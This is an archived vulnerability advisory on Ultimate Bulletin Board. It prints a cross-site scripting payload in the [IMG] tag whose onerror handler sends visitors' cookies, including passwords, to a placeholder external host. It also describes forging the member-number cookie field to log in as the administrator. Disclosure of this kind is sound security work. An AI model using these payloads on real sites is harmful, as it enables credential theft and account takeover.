TUCoPS :: Web BBS :: Frequently Exploited

TUCoPS :: Web BBS :: Frequently Exploited :: ubb3.htm
Ultimate Bulletin Board - Snarf personal info

Vulnerability

Ultimate Bulletin Board

Affected

Ultimate Bulletin Board

Description

Scott Ashman found following. If a user has info stored in a
cookie, replies to a message and is using IE 4.0+ there is a way
for a hacker to trap his IP / user name / password / other cookie
information and send them to an external source using your UBB
code with HTML *off*. There is a way to do this by simply viewing
a message as well, although it's obvious something is going on as
it involves a redirection. Here's how it works.

Apparently the [img][/img] tag allows non-spaced javascript to
run. You can write a line like this:

[IMG]test"onerror="alert('test');[/IMG]

This will run the javascript alert when the image 'test' fails to
load.

Your cookies can hold both the username and password but is only
accessable on the http://sitename/cgi-bin/ path. Script running
on anything in cgi-path (replies) can access it. So

[IMG]test"onerror="alert(document.cookie);[/IMG]

will pop up an alert box with the cookie info on a "reply" page as
it's displayed in the thread review at the bottom.

You can reassign the src of your image (this.src) with
document.cookie tacked on to point to an external page. The weird
thing about imgs and http requests in general is that your
destination does not have to be an image. So

will actually try to access index.html. Hence, you can add actual
passable information to an external cgi or whatever. On the
external page all you need to do is either watch the logs or have
the page itself log any URL variables along with IPs coming in
from the request.

The final line should read something like :

[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
[/IMG]

Pasting this line [no spaces/crlf] in an mesage means that any
user replying to anything in that thread will cause their cookie
to be sent to an external source.

'AlphaVersion' found the same. Anyway, Scott describes a way to
retrieve other user's usernames and passwords by putting some
javascript betweenthe image tags in a message, however there is
an easier way and less noticable way to achieve this. Atfer
logging in 2 cookies are sent (cut from netscapes cookies.txt
file):

host FALSE / FALSE 1013870132 login2451956.1435
02-16-2001%2009%3A48%20AM&2451957.0948

host FALSE / FALSE 1045406132 ubber2451956.1435
alphaversion&<password>&AlphaVersion&45&00000036

The second cookie consists of 5 parts, the username, the password,
the name that will be displayed when you post, a number of which
we are not sure what it means and the member number, padded with
0's.

It seems that the only part that actually gets checked is the
member number. So if you send the saqme cookie, but with a
different member number back (the member numbers can be found in
the messages) you will be logged in as that member. You can then
post messags, edit messages and do whatever else that particular
user can do on the board. It seems membver number 1 is the
administrator, so if you edited netscapes cookie file to make the
cookie say this:

host FALSE / FALSE 1045406132 ubber2451956.1435
alphaversion&<password>&AlphaVersion&45&00000001

you'd be able to edit and delete the messages from all users. To
make matters worse the board will replace the fake cookie with one
that holds the info for the user who's member number you sent
back. This includes the password.

This has been tested on Ultimate Bulletin Board 6.0, Beta 7.8.

Solution

This issue has been resolved in version 5.47e, currently available
in the UBB Members Area at Infopop.com.

As for what 'Alphaversion' found Infopop did release a new beta
version to fix this problem and have released other versions
since, all containing the fix to this problem. Their most current
version of the Beta release is 8.1, the fix was in 7.9, the bug
was in 7.8 (at the moment of writing).